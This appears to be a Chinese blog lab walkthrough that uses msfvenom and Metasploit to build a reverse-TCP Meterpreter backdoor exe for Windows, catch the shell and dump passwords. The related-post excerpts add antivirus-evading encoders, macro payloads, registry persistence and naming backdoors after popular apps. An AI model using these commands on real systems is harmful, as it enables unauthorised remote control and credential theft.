利用windows恶意软件获取windows主机shell

最新推荐文章于 2024-08-09 23:17:29 发布
最新推荐文章于 2024-08-09 23:17:29 发布
阅读量625 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xufenglai123/article/details/131695337
该实验模拟了黑客如何使用msfvenom工具生成恶意软件,通过reverse_tcp连接获取Windows主机的shell权限。在Kali系统中,设置监听模块后,将exe文件拷贝到目标Windows主机并执行,成功监控到程序运行,从而进行后渗透操作,如获取密码和控制系统功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 实验目的:
    • 模拟黑客利用windows恶意软件获取windows主机shell权限的过程
    • 熟悉操作使用的命令
  • 实验准备:
    • kali
    • 同网段的windows主机(关闭防火墙)
    • msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
  • 实验内容:
    • 制作Windows恶意软件获取shell \
    • msfvenom的shell在windows中的使用
    • msfvenom生成shell.exe
  • 实验步骤
    • 制造恶意程序文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.131 LPORT=6060 -f exe

    • 出现载荷与exe文件大小表示成功了
    • 切换到相应界面,查看exe文件

    • 回到kali命令窗口
    • 进入msf控制台 :msfconsole

    • 使用侦听模块设置侦听(加载模块,设置载荷和参数)
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set lhost 192.168.24.131
      • set lport 6060
    • 如图

    • exploit 运行

    • 将之前生成exe运行文件拷贝到win7系统中,并运行

    • 返回kali发现程序的运行已经被监控到,如图

    • 通过meterpreter进行后渗透操作,例如获取密码

    • 获取shell

    • 打开百度以及弹出计算器

    • 效果如图

  • 记录网络安全学习过程,希望能提高大家的安全意识。
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 8844
cobaltstrike之cs上线获取shell
内网权限维持——利用windows注册表
qq_55202378的博客
08-03 1330
windows自启动是指windows系统在启动时会自动允许一些程序或服务,这些程序要么是windows自带的,要么是用户安装的第三方程序。在注册表中,windows自启动程序或服务注意存储在。是windows系统的组件,用于处理与用户有关的各种行为,如扽古路、注销、在登陆时加在配置文件、锁定屏幕等。中,并执行下面命令,通过编辑注册表安装一个端口监视器。中放了一个计算器,注销后重新登录,也会弹计算器。下的注册表的修改下会应用于系统中的所有用户;下的注册表的修改只应用于当前用户。进程,以实现相应的功能。
网络安全kali之利用宏感染word文档获取shell
xueshenlaila的博客
03-25 8360
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
kali后门php,kali获取持续性后门shell · 醉梦半醒’s Blog
weixin_34501374的博客
03-29 512
win7靶机:192.168.1.38kali:192.168.1.35上一篇讲到通过ms17_010获取shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马将exe文件发送给靶机u...
利用Msfvenom获取WindowsShell
DoubleJing的博客
07-18 519
一、在kali主机利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。此时我们已经获取主机地址为192.168.137.133的shell,我们可以利用dos命令进行相应的操作。二、将生成的两个exe文件下载到物理机,使用ssh客户端连接kali主机利用sz工具下载两个exe文件。六、查看是否建立连接。
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
如何利用木马等方式获取shell权限的操作
最新发布
03-15
### 使用木马获取 Shell 权限的技术方法及原理 #### 技术背景 在网络安全领域,攻击者通常利用漏洞或弱点来获得目标系统的控制权。其中一种常见的技术是通过上传恶意脚本(即所谓的“木马”),并借助该脚本来执行...
windows 服务器安全经验总结_青云原创
09-30
这些工具能够帮助管理者进行安全配置和监控,以及清理可能存在的恶意软件。 最后,青云强调了禁用系统危险组件、合理设置服务器系统和网站权限的重要性,并提供了一个指导原则,即在网站权限设置中避免出现EVERYONE...
MSF及Windows渗透测试
qq_67812668的博客
08-09 1220
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
kali获取Window的shell后续一直乱码
GUN_C的博客
11-15 2177
Linux在拿到window下shell 乱码
msfconsole之制作windows木马并成功获取shell(反向payload)
2201_75387456的博客
05-27 900
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
碎冰冰
03-12 2662
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5624
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 4150
msfconsole制作windows木马并上线获取控制权限
制作Windows恶意软件获取shell
2301_77927094的博客
09-10 250
shell 本身并不是内核的一部分,它只是站在内核的基础上编写的一个应用程序。后门病毒是一种计算机恶意程序,利用安全漏洞为攻击者提供对受感染电脑的未经授权的远程访问,后门病毒在后台运行,对用户隐藏,后门被认为是最危险的寄生虫类型病毒之一,因为它允许恶意软件在受感染的计算机上执行任何可能的操作。windows/meterpreter/reverse_tcp:目标系统/攻击架构/攻击方式(这里是对windows系统进行攻击使用的后渗透架构为meterpreter用反向链接的方式。是用来生成后门的软件。
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2693
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1212
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1242
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值